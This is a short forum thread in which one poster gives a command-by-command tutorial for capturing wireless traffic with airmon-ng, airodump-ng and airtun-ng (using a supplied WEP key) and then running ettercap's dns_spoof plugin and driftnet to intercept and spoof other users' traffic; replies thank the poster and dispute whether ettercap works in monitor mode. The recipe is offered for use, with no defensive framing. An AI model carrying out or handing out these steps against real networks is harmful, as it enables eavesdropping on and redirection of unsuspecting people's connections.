ettercap + mode monitor

[yop fr]

link (in french) (more details and pics)

http://bricowifi.blogspot.com/2008/0...-driftnet.html

translate systran go to: http://bricowifi.blogspot.com/2008/0...spoof-msn.html

in a shell:

airmon-ng

airmon-ng start wlan0

(wlan0 my card)

airodump-ng -w w -c 10 wlan0

(-c channel)
(-w w write ine home w "txt and cap name")

modprobe tun

airtun-ng -a 00:11:22:33:44:55 -w 75:67:98:45:65 wlan0

(-a bssid)
(-w wep key) or without for open: airtun-ng -a 00:... wlan0

ifconfig at0 up

now run ettercap in graphic

sniff with at0 (unified and remote connection)

now you can run dns_spoof plugins, driftnet...



it's verry easy and semi passif

[benzslr123]

thank you for this tutorial =]
i'll be testing it out as soon as i get home later..

[imported_=Tron=]

The thread title is perhaps a little bit misleading as ettercap will not run in monitor mode. In this case a tun interface simply replaces the otherwise normal connection and you sniff the traffic generated by clients that connects to this fake AP. Personally I have never managed to successfully sniff an airtun-ng interface with ettercap, even when bridging two interfaces together, but guess I will have to take another look and figure out what I was doing wrong. Thank you for the link.